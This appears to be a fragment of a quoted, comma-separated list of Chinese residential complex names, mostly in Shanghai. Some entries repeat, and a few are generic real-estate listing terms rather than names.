"同盛豪园", "宏城公寓", "城市新邸", "城市名园", "浩城华苑", "南花苑", "伟莱家园", "大宁公寓", "河畔雅苑", "奎江公寓", "经典花园", "曲阳住宅楼", "久阳滨江公寓", "久事西郊花园", "锦绣江南", "海高苑", "同润加洲", "欧洲豪庭", "茉莉苑", "虹瑞公寓", "蓝堡爱琴海", "创联金海花苑", "学园绿洲", "青青白洋淀恬园", "上地公寓", "亿润苑", "汇金公寓", "现代星洲城", "嘉宏紫薇园", "蓼花汀花园", "由由新邸", "申能秀庭", "恒城花苑", "馨康苑", "剑桥别墅", "东方新座滨江茗园", "桂园公寓", "御桥馨华苑", "山水苑", "盛源新苑", "新文苑", "莲泰苑", "虹桥银城", "西郊景园", "兴业公寓", "阳明花园广场", "都市花苑", "华科公寓", "太湖美山庄", "瑞嘉苑", "众源公寓", "庐迅大厦", "聚贤煌都", "平江新城", "智荟苑", "圣陶沙花园", "德阳花苑", "万科朗润园", "浣纱雅苑", "明珠福邸", "和平商厦", "丽都别墅", "西郊一品苑", "华晖绿苑", "新兴大厦公寓楼", "丝庐花语", "柏仕晶舍", "华生大厦", "宏祥花苑", "幸福小镇", "明丰绿都", "仁恒河滨花园", "虹桥中华园", "新海城", "鹏利海景公寓", "同济国康公寓", "乾龙苑", "学府家园", "永和新城", "物华园", "绿洲半岛", "恒力锦沧花园", "欧洲之星", "曹阳华庭", "万峰馨苑", "银星名庭", "涵合园", "汇佳苑", "荣丰花园", "祥和公寓", "虹桥加州风情", "明辉华庭", "星源花苑", "上海多伦多", "民达大厦", "云都新苑", "双龙汇", "昌里薪寓", "红莲大楼", "精彩华虹公寓", "上海蓝山", "恒凌公寓", "星惠佳苑", "四季绿园", "涵合园", "永兴富邦", "徐汇芳邻", "海上新月", "绿邑叠翠", "领秀府邸", "宜居", "开城新苑", "银鹿大厦", "徐汇龙庭", "大和别墅", "碧瑶花园别墅", "虹口宜家", "海源别墅", "文坊", "崇文苑", "乐扬金榜星墅", "双喜家园", "合生城邦", "星城美景", "盈翠豪景", "曲阳人家", "天峰公寓", "运杰城市花园", "外滩滨江名人苑", "富成园", "阳光欧洲", "新青浦佳园", "南馨公寓", "亚都国际名园", "海虹苑", "翠庭苑", "御华名苑", "海悦花园", "文定天下苑", "金宝大厦", "新凤凰城", "东方汇景苑", "华元公寓", "建明花苑", "仁恒河滨城", "时代绿园", "黄浦品", "蓬莱大厦", "宏业大厦", "同润加州", "北欧阳光庭园", "证大家园", "上海故事", "荣欣大厦", "首席名邸", "上大阳光", "乾宁苑", "建德南郊别墅", "南翔东海别墅", "凤六新苑", "维诗凯亚", "城市之星", "丽水华庭", "东泰大厦", "楠林水岸", "吴越天下", "中福花园", "青年汇", "锦丽斯公寓", "共康公寓", "大上海城市花园", "金舟苑", "虹祺花苑", "新上海一家人", "荣盛名邸", "欧风丽都", "绿洲江南园", "杰仕豪庭", "梦家园", "凯旋华庭", "璞真园", "伊莎士花园", "狮城豪庭", "逸居虹口", "逸虹景苑", "世博花园", "佳达新苑", "黄兴公寓", "中海翡翠湖岸", "新华绘", "东湖名苑", "黄浦众鑫城2期", "家公园", "台益公寓", "康河原味", "南洋博仕欣居", "西藏北麓", "仁和恬园", "长久大厦", "市光新苑", "凯润金城", "上海蓝堡", "城投世纪名城", "菊芝苑", "龙居花园", "当代高邸", "学府双星", "兰港大楼", "尚都", "世纪之春花园", "随园", "康诗丹郡", "益海公寓", "上游会舍", "景福苑", "永泉公寓", "青青白洋淀", "龙祥公寓", "路易凯旋宫", "皇朝新城", "靖宇大厦", "新城逸境园", "同济佳苑", "同领都会", "芳沁苑", "控江一村块", "建设新苑", "第九城市", "浦东虹桥花园", "上南花城", "海泰大厦", "中通大厦", "中天碧云", "馨空天地", "永业公寓", "凯兴苑", "望族新苑", "古北新城", "世纪新作", "天合大厦", "天裕小筑", "协和世界广场", "康桥水乡", "金色探戈", "正峰苑", "天合大厦", "天裕小筑", "海联苑", "虹桥蒂凡尼花园", "中科大学村", "帕萨迪纳", "虹梅家人", "泰鸿苑", "天邻英花园", "东苑古龙城", "京浦花园", "东银茗苑", "爱法小天地", "温莎别墅", "光明城市", "凯城景庭园", "东方滨港园", "瀚杨苑", "明月清泉别墅", "春岚苑", "远中风华", "浩润苑", "阳光万源公馆", "华鼎广场", "静鼎安邦府邸", "虹桥中洋公寓", "天宝绿洲", "文锦大厦", "成发苑", "晟虹新景", "联洋新苑", "安居花苑", "棕榈泉花园", "静安恬园", "和平花苑", "康隆广场", "千秋嘉苑", "复地太阳城", "嘉发大厦", "绿地南桥新苑", "徐汇金座", "静安鼎鑫家园", "天合大厦", "久阳文华府邸", "现代映象", "昌里花园", "广洋苑", "云都苑", "云润家园", "百汇中心", "独立时代", "中央富景", "银华苑", "新柳公寓", "百汇中心独立时代", "阳光星期八", "四方新城", "恒联名人世家", "景湖别墅", "君临颐和花园", "三和花园", "碧云东方公寓", "长岛公寓", "新中星华庭", "虹漕公寓", "静安兴海城", "颐峰苑", "魅力徐家汇", "帆升公寓", "东源丽晶别墅", "富容大厦", "曲阳名邸", "爱家亚洲花园", "大宁绿湾", "宁泰馨苑", "东海街园", "徐汇新湖云庭", "成亿花园", "杨浦公寓", "申银发展大厦", "淡水湾花园", "景泰嘉苑", "紫竹苑", "和一大厦", "西郊大公馆", "西郊新典别墅", "兴和苑", "幸福365", "宜川华庭", "华通大厦", "大豪山林别墅", "康琳大楼", "逸园", "锦安公寓", "新月佳苑", "文曲苑", "合虹公寓", "亭汇花苑", "梅山大楼", "沁春名邸", "宝利金", "花好月圆", "静安大闻", "丽都苑", "浪琴水岸花园", "永和新城", "阳城", "千路公寓", "兴星公寓", "老西门新苑", "名门滨江苑", "海阳明园", "日月新殿", "康健星辰", "联洋社区", "金都花好悦园", "上海映象", "阳城苑", "中科新苑", "东方丽都", "绿波花园别墅", "明华苑", "华东花苑", "古北嘉年华庭", "华元豪庭", "左岸丽景", "嘉玉龙庭", "叠加苑", "创欣南苑", "徐汇99", "双钱公寓", "中煌大厦", "太阳都市花园", "春港丽园", "胜利家园", "夏阳湖国际花园", "盛世天地", "红叶别墅", "东方曼哈顿", "美林小城", "西郊玫瑰湾", "万兆家园", "莱茵清境", "生活艺术居", "北海大厦", "华亭绿景苑", "大都会和风别墅", "世纪花园", "凯旋花苑", "怡乐花园", "静安国际花园", "世和园", "都林龙苑", "徐汇华庭", "新汇公寓", "耀江国际广场", "上海绿城百合苑", "九洲大唐花园", "科乐苑", "明申商务广场", "艺品", "黄兴", "易初生活", "金牛苑", "万豪苑", "大运盛城", "锦江", "锦馨苑", "恒海云庭", "通汇公寓", "漪园区", "月光流域", "华苑大厦", "永嘉公寓", "南郊别墅", "阳光摩天城", "同润别庄", "桂林花苑", "桂林苑", "中环明珠", "景明花园", "万源晶典", "悉尼星光", "盛族家园", "腾王阁", "中友嘉园", "紫竹华庭", "师大森呼吸", "华山香榭", "正力公寓", "龙威名邸", "紫欣公寓", "紫欣新座", "上海奥林匹克花园", "龙南平价房", "宜嘉商务楼", "逸流公寓", "贵龙园", "金苑", "利富商贸大厦", "盛源晶华", "开城公寓", "天际花园", "星云名座", "金鹰大厦", "海悦酒店式公寓", "新华世纪园", "新汾阳公寓", "嘉宝花园", "日月华庭", "莱茵半岛", "精文公寓", "同达创业大厦", "万源杰座", "豫欣公寓", "城市山林", "虹桥丽园", "绿地国际家园", "澳龙公寓", "莘梓苑", "金龙花苑", "梅花园", "海湾艺墅", "福阳大厦", "佳达新苑", "闵富大厦", "音乐河", "静安生活恋曲", "金铭", "文博水景别墅", "蓬莱家园", "居易莘庄", "团结花苑", "华商山庄", "虹漕星都", "绿雅苑", "梅陇紫藤一村", "东苑米蓝城", "金鑫怡苑", "香港新世界花园", "丹桂花园南苑", "鹿澄天地", "艺品黄兴", "科普楼", "雅典花苑", "宜居生活", "华阳公寓", "歌林春天", "仁达公寓", "安盛景园", "上海88区", "虹康花园别墅", "恒丰古北家苑", "新华公寓", "大华愉景华庭", "莲浦府邸", "时代映象", "和嘉公寓", "悦达花苑", "阳光海岸", "鑫龙苑", "龙庭秀舍", "绿泉公寓", "满庭芳花园", "全装修现房", "东方云顶", "东兰兴城", "欧风花都", "佳宁花园", "华宁小区", "盛世海岛风情酒店", "阳光加州", "国际村", "精文城市家园", "城市生活馆", "大家源虹德苑", "帕萨迪纳", "民星家园", "华祺苑", "天山新苑", "白金瀚宫", "德华苑", "共和大厦", "上海花城", "中邦风雅颂", "长堤花园别墅", "锦灏佳园", "五洲大厦", "飞洲国际广场", "正文花园", "岭南雅苑", "笠园", "凯旋坊", "高富丽源名邸", "徐汇鑫秀", "罗秀家园", "中虹丽都苑", "兴国大厦", "皇都花园", "住友昌盛新苑", "世纪景典", "花木苑", "罗马花园", "格调星洲", "百年徐汇*紫汇苑", "爱法维也纳新都", "华阳森活馆", "华阳公寓", "万科假日风景", "生活的艺术", "陆家嘴国际华城", "莘城公寓", "新华大厦", "兰桥公寓", "春满园公寓", "格林蓝天", "雅庐苑", "平武公寓", "爱丁堡", "天意洲家园", "品翠苑", "中山广场", "丽都新贵", "康宁雅庭", "绿家园", "长峰广场", "浦江大厦", "现房清盘", "翔殷心秀", "天翔苑", "华盛名门", "浦江花苑", "虹景家苑", "莱茵风尚", "万兆家园", "当代曹杨", "志豪公寓", "天诚花苑", "提香别墅", "南都韵园", "平安大厦", "常德名园", "佳信都市花园", "华融国际大厦", "民丰苑", "曲阳豪庭", "鸿申大厦", "四季茗苑", "新空间家园", "花园城", "踵嘉城", "嘉阳公寓", "金樽国际", "万兆家园", "莱茵枫景", "快易居", "长欣新苑", "美丽华花园", "宝纳文化源", "好世凤凰城", "星光名门", "马赛花园", "富兰克林", "新南家园", "剑桥景苑", "紫云大厦", "优族", "亲访曹安", "康馨家园", "明安绿苑", "翠庭", "四季沙龙公寓", "同方锦城", "富仕名邸", "新华名门", "紫藤居", "天赐别墅", "时代星园", "好第坊", "巴黎花园", "金榜世家文馨苑", "星俪苑", "日月新殿", "兴联大厦", "森林都市花园", "恒联新天地花园", "鑫都佳园", "维多利大厦", "巴黎时尚", "博园", "都市精品", "香榭苑", "晶钻博华苑", "徐汇秀水苑", "新梅共和城", "盛业公寓", "顺驰蓝湾", "香梅花园", "紫堤苑", "新华都商务花园", "上海公馆", "天台家园", "金斯美邸", "太和名邸", "江南名庐", "人本主邑", "桂竹香公寓", "景博花园", "东陆锦悦苑", "时代", "一天厦", "大厅广中", "万里苑", "云阳花苑", "地王中心", "虹田苑", "龙踞大厦", "齐盛世纪花园", "温莎半岛别墅", "都市水乡", "宜嘉苑", "康琳大楼", "名都城", "协和海琴花园", "泰苑", "文馨园", "金桥新城", "金石苑", "新华花苑", "虹口知心", "淞浦苑", "翡翠湾公寓", "现代华庭", "王子公寓", "彭豪公寓", "公馆", "艺术", "生活", "三盛颐景园", "仲信苑", "香榭花都", "弯弯别墅", "都市华庭", "广洋苑", "福楼望邸", "复旦书馨公寓", "珍宝公寓", "浦江茗园", "世纪梅陇镇", "东湖铭苑", "长宁馥邦", "凯旋花园", "新安公寓", "桥语别墅", "上海未来", "音乐广场", "龙柏易居", "美岸栖庭", "新华豪庭", "锦绣一方", "新华嘉利公寓", "丽水华庭", "华庭艺墅", "康泰东苑", "良辰美景", "虹桥新城", "良辰世家", "新华盟", "钻石之盟", "时代逸居", "茂名大厦", "中虹明珠苑", "海琪园", "怡泰花苑", "华业公寓", "东方广场", "上海紫园", "东方夏威夷", "振颖苑", "金色西郊城", "文化名园", "韵动时代", "易居紫荆苑", "复地美墅", "大居苑", "中城绿苑", "虹桥晶彩", "桃源兴城苑", "江南世纪新苑", "白金府邸", "朱莘苑", "金沙雅苑滨湖世家", "莘华世家", "西园", "申源苑", "天然居", "锦龙苑", "莘华世家", "南园", "春天花园酒店公寓", "九方家园", "申亚新华府", "金汇花园", "碧林湾", "晨林花苑", "邻岸东方", "南泉公寓", "东方花园", "四季运动汇", "丰盛雅苑", "书香公寓", "全家福家园", "虹梅人家", "东浩枫景苑", "明丰花园", "宏安家园", "康沁苑", "师大深呼吸", "罗阳新村", "兰馨雅苑", "艺术传家堡", "罗秀苑", "泰宸舒庭", "泰宸景苑", "明丰阳光苑", "上海银座", "嘉年城市新苑", "凯托大厦", "徐汇生活", "三泉家园", "水清苑", "莲花新村", "上海绿城", "上海诗林", "锦翠苑", "信利苑", "曹杨五月天", "阳明国际花苑", "珺乐苑", "龙柏金铃公寓", "园林天下", "银龙小区", "地铁明珠苑", "丰舍", "西郊九溪十八岛", "江南新浪", "金霄云邸", "风度国际", "东淮海公寓", "时代金领", "金桥爱建园", "四季园", "陆家嘴大人物", "仙都绿苑", "赞成", "黄兴绿园", "徐家汇花园", "虹梅佳苑", "泓园", "昌里新寓", "红莲大楼", "樟树苑", "徐汇晶典", "虹桥嘉景", "天山中华园", "龙东花园", "年平花苑", "儒园", "银晨数码大厦", "东靖苑", "华申大厦", "蒙自大楼", "富隆苑", "世外桃源花园", "张杨南苑", "东怡花苑", "博捷名苑", "漓江山水花园", "西郊家园", "金桥好人家", "静安左岸名门", "傲园", "紫藤新园", "含香馆", "聚豪天下", "云和花园", "绿地泾南公寓", "昆仑花苑", "申江名苑", "御翠园", "未来窗", "江南文化园", "达安花园", "中兴城", "宝华雅苑", "福鑫大楼", "江南造船广场", "亚太盛汇", "徐汇鑫秀", "黄浦花园", "欣宏嘉园", "千禧静安", "绿景园", "新湖明珠城", "奥玎", "宫廷", "别墅", "大同花园", "锦绣江南", "玉华东苑", "绿缘公寓", "开城新苑", "碧云国际社区晓园", "水岸茗苑", "华安苑", "柳岸人家", "东晖花苑", "智慧人家", "摩登静安", "达安锦园", "虹凉馨苑京邸翠庭", "名门世家", "名门河滨花园", "民主新苑", "景河苑", "旭日之城", "枫丹白露别墅", "共康小区", "汇康公寓", "永久城市花园", "阳光西班牙", "北华苑", "协和城", "枫林雅苑", "中星海上名庭", "幸之苑", "上海星港", "剑桥景苑", "金鼎公寓", "远景佳苑", "多摩远景", "大富苑", "剑桥景苑", "福华花苑", "锦辉绿园", "林克司别墅", "虹叶茗园", "世纪虹叶", "世茂滨江花园", "北杰公寓", "瀚林世家", "英伦花园", "准现房", "亦园", "金棕榈公寓", "经纬城市绿洲", "阳光水岸家园", "嘉富丽苑", "天馨花园八、九期", "天香公寓", "上南雅筑", "紫藤佳苑", "南江公寓", "武泰公寓", "大华水韵华庭", "感性达利", "淮海新名门", "虹林新苑", "西郊紫郡", "富丽大厦", "公园3000", "虹桥城市花园", "虹景苑", "湖畔佳苑", "咏蝶苑", "和兰苑", "住友嘉馨名园", "中央花园", "亨纳斯花园", "和馨苑", "长发虹桥公寓", "文涛阁", "和平公园泰成花苑", "雍景园", "汇园小区", "欧阳名邸", "恒益公寓", "法华门大厦", "汇佳新苑", "家骏花苑3期", "彭浦家园", "理想国爱甸苑", "立雪苑", "欢天喜地", "锦绣苑", "仙霞首府", "虹桥新天地", "国际丽都城", "复兴佳苑", "绿康公寓", "当代成品峥宸苑", "古北中央花园", "晶品汇", "国鑫大厦", "北美田园", "半岛水花园", "翠堤春晓", "春意苑", "申地苑", "汇成宾阳苑", "虹口龙庭", "永巍公寓", "国亭花苑", "爱迪公寓", "上海国际华城", "畅园", "冠生园", "东方佳苑", "南洋新都", "西部名邸", "宝安新苑", "枫逸人家", "乔爱别墅", "郁庭峰", "大华水韵华庭", "华翔公寓", "丽都康城", "陆家嘴新景园", "意和家园", "悠诗阁", "星阳苑", "锦绣阁", "纯翠上南", "淮海新公馆", "强生古北花园", "御墅临枫", "顺意苑", "嘉园", "黄兴广场", "尊园", "天马花苑", "海誓山盟", "亚成公寓", "静安华府", "宝地绿洲城", "上海映象", "汤臣高尔夫别墅", "福安大厦", "东苑利华", "奥塞花园", "国际金融家", "阳光爱琴海", "文化花园", "金港花园", "创智年代", "金淙苑家源", "陆家嘴生活中心", "上大阳光", "乾泽园", "汇京佳丽园", "中星云庭", "西郊龙柏香榭苑", "瑞南新苑", "高峰汇", "紫晶南园", "美树铭家", "锦华花园水景苑", "三湘世纪花城", "芝梅苑住宅", "上海壹街区", "平阳绿家园", "天伦家园", "陆家嘴中央公寓", "长阳新贵", "旺增公寓", "恒大华城", "天地苑", "飘鹰花苑", "头桥大宅小区", "安基明珠", "实华公寓", "黄浦新苑", "景庭", "古北佘山国际别墅", "日月新苑", "宏润公寓", "汇丰佳苑", "虹口典范", "连城", "香榭丽花园", "康华苑", "银涛高尔夫别墅", "华能城市花园", "新泽西庄园", "森林湾", "樱缘花园", "金桥丽景", "凯鑫苑", "延安嘉苑", "和达家园", "中虹花园", "锦秀文华", "安基明珠", "实华公寓", "满庭香半岛", "瑞金福地", "福华花苑", "太阳湖大花园", "白玉兰家园", "徐汇兆嘉园", "奥克苑", "菱翔苑", "海通花苑", "南虹公寓", "绿洲苑", "屹立家园", "知音艺园", "龙昌苑", "明园世纪城", "科汇景苑", "云都公寓", "卢湾都市花园", "新亚徐汇公寓", "檀宫", "幸福苑", "西部俊园", "君怡公寓", "御品大厦", "山水世纪", "九歌花园", "挹翠名门", "林顿大厦", "世茂湖滨花园", "现代律感", "乾清苑", "中恒苑", "泰晤士小镇", "珠江香樟园", "汇龙新城", "海斯大厦", "阳光苑极景易家", "棕榈滩别墅", "黄金海岸", "长宁盛居", "上海领秀爱建园", "沔溪苑", "虹祥福邸", "乾弘佳园", "新静安都市", "长春新苑", "陶园", "南花园和中华苑", "香港丽园", "锦蝶苑", "古北国际花园", "徐汇龙兆苑", "万科华尔兹花园", "新地大厦", "壹间房", "张江国际酒店公寓", "飘鹰东方花园", "新天家园", "淞园小区", "美丽星城", "徐家汇景福苑", "静城公寓", "永厦大楼", "上海人家", "地方天园", "环龙公寓", "莘城苑", "望江苑", "协通公寓", "柳明公寓", "清悠时代", "新虹桥风情", "广虹馨苑", "新地苑", "皇宫半岛别墅", "西渡指挥部", "东方太古花园", "南吉公寓", "凯欣豪园", "长阳新贵", "旺增公寓", "东方城市花园", "兴林公寓", "嘉丰佳苑", "经典花园", "兰村大厦", "中华大街", "东业大厦", "欧香名邸", "西渡指挥部", "雅园", "惠达大厦", "生茂养园", "奉浦苑", "上海五月天", "贵都万体景苑", "申升公寓", "汇丽苑", "金坤服务公寓", "世纪海岸广场", "长丰公寓", "金色航城", "徐家汇景园", "九九园", "佳日公寓", "世袭愚园", "方圆公寓", "秋水云庐", "华唐苑", "宝地新品居", "万兆家园", "莱茵春舍", "华佳花园", "古北新城", "新月丽苑", "中凯城市之光", "振宏公寓", "颛溪新苑", "宝莲湖景园", "静安顺德苑", "文化佳园", "上海莘城", "牡丹阁", "博鸿大厦", "新外滩花苑", "上海莘城", "华银府邸", "浦江天第苑", "塞纳左岸", "达安花园", "静安景观豪庭", "香树丽舍", "丰华家园", "美邻苑", "泰兴广场", "安宁欧洲花园", "徐汇自由度", "居礼", "上海之窗", "御景园", "水仙苑", "中京苑", "思南新苑", "上海康城", "海湾豪宅", "春申景城", "金水湾贵园", "君怡公寓", "幽兰雅筑", "金桥一方", "雅苑", "水岸家苑", "法华门大厦", "平吉世纪家园", "新城枫景", "东方苏荷", "金宇别墅", "虹桥金斯花园", "御风国际", "美晶佳园", "泰古公寓", "恒安大厦", "万升家园", "锦秋花园", "紫荆苑", "上海豪园", "河滨豪园", "新翔公寓", "贵仁绿苑", "阳光新天地", "万都花园", "成亿家园", "城市丽园", "小富人家", "亦园", "福泰公寓", "紫罗兰家苑", "东方名城", "宜仕怡家", "恒力苑", "嘉城", "翰林苑", "财智时代", "扬波大厦", "飘鹰花园", "中星海上华庭", "润和苑", "凯鹏大厦", "长城花园", "金华苑", "森都公寓", "洪远公寓", "好世樱园", "易居东城", "中海", "叠翠别墅", "古北家苑", "华光花园", "美丽园大酒店", "嘉美美家", "华舟大厦", "中海馨园", "领秀丽墅", "华亭雅居", "金水湾", "贵园", "鑫安公寓", "明丰佳园", "安基大厦", "新世纪名苑", "城品人家", "三泉家园", "虹桥金俊苑", "森南大厦", "长寿商业广场", "城市桂冠", "元福大厦", "现代康桥", "百舸馨苑", "真情家公园", "真情公寓", "锦沧公寓", "西班牙名园", "欧罗巴生活", "今天花园", "屹立公寓", "鑫国家园", "圣马丽诺桥", "华夏金桂苑", "北美公寓", "北美枫情", "飞旺家园", "复地雅园", "中海", "叠翠别墅", "上环公寓", "东方雅苑", "海上海新城", "住宅", "墅邻花苑", "幸福第二公寓", "绿地西郊别墅", "上海滩花园洋房", "锦凯华苑", "广盛公寓", "虹光公寓", "华城秀庭", "天外翠湖", "君安乡村别墅", "绿带风光", "源景苑", "阳光绿园", "天虹苑", "虹康景博苑", "共富新村", "国地公寓", "碧云108", "金桥酒店公寓", "传人雅居", "新竹小区", "优诗美地", "博园", "家化滨江苑", "罗溪花苑", "阳光名邸", "丽都成品", "嘉骏花苑", "玲珑碧寓", "临江三村", "云峰苑", "晶彩加拿大", "金衡公寓", "耀江花园", "杨泰苑", "创世纪花园", "纽约座", "安信·湖畔天地坊", "安丰小区", "同泰公寓", "福赐新苑", "汤臣豪庭美丽空间", "名盛苑", "富锦苑", "东珂花苑", "创世纪河滨花园", "高境欣苑", "梦蝶苑", "虹领公寓", "高境苑", "牡丹锦苑", "龙柏西郊公寓", "水岸名邸", "海昌苑", "璟都新园", "兆丰虹桥公寓", "浩润大厦", "虹口情缘", "宇泰景苑", "锦秋加州花园", "东方剑桥", "玉佛城", "岭南苑", "宝启花园", "梅陇城", "望族苑", "沈默荷兰园", "虹康景博苑", "伟达盛宅花园", "巴洛克宫廷", "紫东新苑", "博爱家园", "景园", "乾心花园", "东兰兴城玉兰苑", "意凯花苑", "鸿力公寓", "大唐花园", "金竹园", "海德名园", "罗马花园", "天极盛宅花园", "徐汇一品苑", "阳光世纪城", "南部阳光翠庭", "青年汇", "好旺苑", "新明星花园", "海博大厦", "滨江雅墅", "临潼苑", "大华公园", "西郊华城", "石涛园", "天安别墅", "东方日出苑", "意和家园", "今达花园", "九九别墅", "非常地中海", "申德公寓", "润欣公寓", "虹锦佳话", "正南花苑", "赢家时代", "豪门府邸", "红叶东苑", "太阳别墅", "知雅汇", "志成花苑", "绿洲长岛花园", "开隆公寓", "丽华公寓", "金色枫情", "金枫豪苑", "东方金门花园", "三湘花园", "嘉汇广场", "博泰景苑", "紫光苑", "吉祥苑", "绿苑别墅", "中艺花园", "西班牙名园", "海高花苑", "金色港湾", "金上海花园", "樟树缘公寓", "宏凯公寓", "西环公寓", "上海临汾名城", "公园城市", "世纪同乐", "兰侨大厦", "海天花园", "叠翠别墅", "苏堤春晓名苑", "金桥一景", "文宇大楼", "静安花苑", "中通公寓", "外滩鉴赏家", "扬子江大厦", "珊瑚花苑", "桃林公寓", "东方星座", "环球广场", "辛耕大厦", "飞越虹桥", "锦馨苑", "崇明新城明珠花苑", "虹口小城", "隆达公寓", "五矿公寓", "爱莲屋", "嘉和花苑", "万宇漓水花苑", "华东公寓", "新家坡美树馆", "海联花苑", "云间绿大地别墅", "瑞虹新城优贤生活", "华伦公寓", "国威大厦", "宏莲馨苑", "唐山新苑", "茂兴大厦", "海伦新苑", "浦江风景苑", "振新大厦", "莘雅名门", "巴黎时光", "金鹏公寓", "凯虹家园", "贞观艺树林", "恒昌花园", "大华清水湾花园", "复兴南苑", "虹口商城", "涵乐园", "新时空国际公寓", "博园小区", "梅福花苑", "怡峰园", "紫丁香花园", "嘉利豪园", "宇泰公寓", "泰德苑", "紫阳花苑", "罗马假期", "乾鸿苑", "清馨苑", "名都新城", "鹤庆花苑", "可乐苑", "虹康家园", "金色黄浦", "绿宸家园", "泰业公寓", "爱中爱华大厦", "安亭新镇", "世晶花苑", "华都公寓", "阳光永业", "金地格林春晓", "西渡", "锦港新村", "广粤路高层", "半岛花园", "佘山宝石别墅", "枫丹白露别墅", "华宝花园", "同济杰座", "同汇苑", "九歌名苑", "花园村雅苑", "荣胜公寓", "金汇", "鸿锦苑", "天合雅园", "金阳怡景公寓", "新外滩花苑", "中闻公寓", "金星苑", "金桥名都", "虹口易家", "虹北公寓", "虹山半岛", "都市山庄", "中山公寓", "华敏翰尊国际", "东郊长岛别墅", "虹桥尊邸", "永怡公寓", "南溪公寓", "帝庭", "艺墅学苑", "虹桥首席", "东苑怡和苑", "虹莘小区", "贤居天下苑", "龙兴苑", "典雅公寓", "文化人家", "裕盛豪园", "生活点睛", "龙腾苑", "虹梅新苑", "西渡鸿吉苑", "珠江新城", "龙缘花园", "龙辰苑", "鹤北新苑", "静安丽舍", "舜龙公寓", "大华阳城花园", "东方都市", "华敏世纪广场", "江南名邸", "枫庭丽苑", "贵都苑", "兴银花园二街坊", "金台苑", "中兴财富国际公寓", "休闲广场", "申江名园", "久业公寓", "新时代花园", "圣得恒业花园", "西郊宝成花苑", "广海花园", "鑫海苑", "锦南公寓", "领秀赏", "兰馨苑", "万峰梦湖苑", "东方异彩", "龙阳花园", "永升大厦", "碧云花园", "虹口现代公寓", "康桥花园", "东园", "丹花苑", "阳光高城苑", "天伦家园", "虹康花苑", "曹杨家园", "中虹翡翠园", "领世馆", "淮海世纪花苑", "黎安人家", "爱法天地", "嘉汇广场", "金桥盈翠庭", "衡园", "金地格林春岸", "静安河滨花园", "春申城四季苑", "仙霞大郡", "兰沁苑", "景星苑", "山水秀", "东苑半岛", "北美之林", "江南山水", "华光紫荆苑", "星辰公寓", "东亚新苑", "威宁花苑", "仙霞紫庭", "金坤花园", "海伦香榭", "海伦都市佳苑", "春申家园", "名人雅居", "沪贵苑", "阳光威尼斯", "仁恒滨江园", "东安大楼", "三鑫花苑", "上海济川国际广场", "嘉美坊", "畅想苑", "明泉公寓", "宏泰公寓", "莱金佳园", "张杨福邸", "华阳苑", "北欧丽景", "东川花园", "雅仕轩", "华景苑", "贝越广兰苑", "宝仪花苑", "梓树园", "日月豪庭", "兴荣家园", "宝安新苑", "淞虹苑", "绿地世家", "虹桥阳光翠庭", "晶采名人大厦", "华山嘉苑", "太原邸", "静安新邸", "康桥南园", "明申花园", "大华阳城", "书院", "罗山绿洲别墅", "绿园四村", "威海苑", "和平南苑", "杰士豪庭", "富都花园", "金兰花苑", "钱江大厦", "虹口玫瑰苑", "海伦公寓", "海富公寓", "九龙锦江大酒店", "绿地世纪花苑", "西郊华庭天下", "静庐懿德公寓", "永盛苑中心站", "西郊庄园", "林梅新村", "徐汇苑", "博泓大厦", "澳马花园", "金海湾别墅", "龙柏金悦公寓", "广兰名苑", "海普苑", "海上花园", "鉴赏新华", "金羽名庭", "景宏嘉园", "陆家嘴新景园", "名都公寓", "虹桥花苑", "华辉绿苑", "写意生活馆", "锦良苑", "文怡花园", "龙臣公寓", "卢湾滨江南园", "龙柏中康公寓", "颐德名苑", "上南绿茵苑", "冠龙家园", "风华水岸", "东兰新城", "海湾世纪佳苑", "世纪阳光园", "静源", "生活艺术居", "新领地", "虹桥绿苑", "盛绿苑别墅", "珠江香樟南园", "绿地科创大厦", "长辉花苑", "徐汇俊园", "荣承公寓", "锦绣华庭", "天秀苑", "滨康大楼", "锦绣人家银杉苑", "康桥水都", "陇福苑", "西郊一品花园", "鸟与花乡", "山水苑", "阳光富比仕", "西部俊园", "银鑫高级公寓", "紫叶花园", "爱法奥朗新庄园", "东渡名人大厦", "上海豪都国际花园", "虹桥光大花园", "虹桥逸品", "绿洲仕格维花园", "南洋新都", "新虹桥明珠花园", "聚星苑", "正旺苑上海奥斯卡", "申贝大厦", "星上海廊侨", "林南花苑", "鲁班公寓", "阳光里阳光翠竹苑", "明日新苑", "东方御花园", "莘都巴洛克", "三琳花园", "徐汇百第宜山大楼", "徐汇37", "绿地世纪花园", "当代艺墅", "绿川新苑", "东上海新城", "安盛花苑", "安盛杉庄", "众众家园", "莱阳生活赏", "东银曲阳花苑", "金汇华光城", "上海春城", "昌里雅苑", "名师华苑", "山泉花苑", "时代花园", "大华颐和华城", "阳光爱琴海", "丽景新苑", "盛大花园", "江南清漪园", "虹桥乐庭", "江桥二村", "世纪苑", "香阁丽苑", "公园世家", "九亭明珠苑", "君临天下花园", "富林四季", "诺丁区", "天山大厦", "同润家园", "申立苑", "溢盈河畔别墅", "亚都国际名园", "新上海弄里人家", "金缘坊", "康虹佳园", "亚都国际名园", "黄兴绿地", "佳泰花园", "华高新苑", "大众河滨", "日安清庭", "国富苑", "锦三角花园", "裕丰大厦", "叠翠别墅", "建中大楼", "玉华苑", "雅仕轩", "盛世家园", "哈佛公寓", "远洋广场", "万邦都市花园", "虹桥华庭", "泗泾颐景园", "勤凯大楼", "乔顿花园", "鑫华俊园", "天宸美景", "心仪雅苑", "天马大厦", "贵龙苑", "华丽家族古北", "复泰华庭", "海鸿公寓", "金龙东苑", "新华御庭", "住友名人苑", "美丽公馆", "圣约瀚名邸", "天山河畔花园", "中星雪野家园", "淞虹公寓", "紫荆苑", "九州家园", "静安桂花园", "爵士静安", "馨庄明珠", "富天苑", "上海人家", "龙珠花苑", "英国会", "银叶苑", "荣鑫公寓", "真情家公园", "真情公寓", "一品新筑", "榆汾新苑", "阳升公寓", "运泰公寓", "上海大公馆", "西部名都花园", "双阳公寓", "新家老家", "白玉苑", "东兰世茗雅苑", "绿茵高地", "开城公寓", "申桂公寓", "盛世年华", "联洋花园", "天合苑", "虹桥公寓", "平利公寓", "明和苑", "绿茵高地", "沧海苑", "棕榈泉花园", "东苑", "万吉花园", "伊东苑", "南康公寓", "共富富都园", "中汇公寓", "东田公寓", "华升花苑", "时代欧洲公寓", "中星羽山公寓", "星惠佳苑", "世纪花苑", "锦福公寓", "弘扬沁园", "汇元坊", "金纺小区", "万科蓝山小城", "明丰世纪苑", "申晨公寓", "和泰花园", "嘉利明珠城", "中虹花园", "新都苑", "虹桥向日葵", "兴联公寓", "和玉苑", 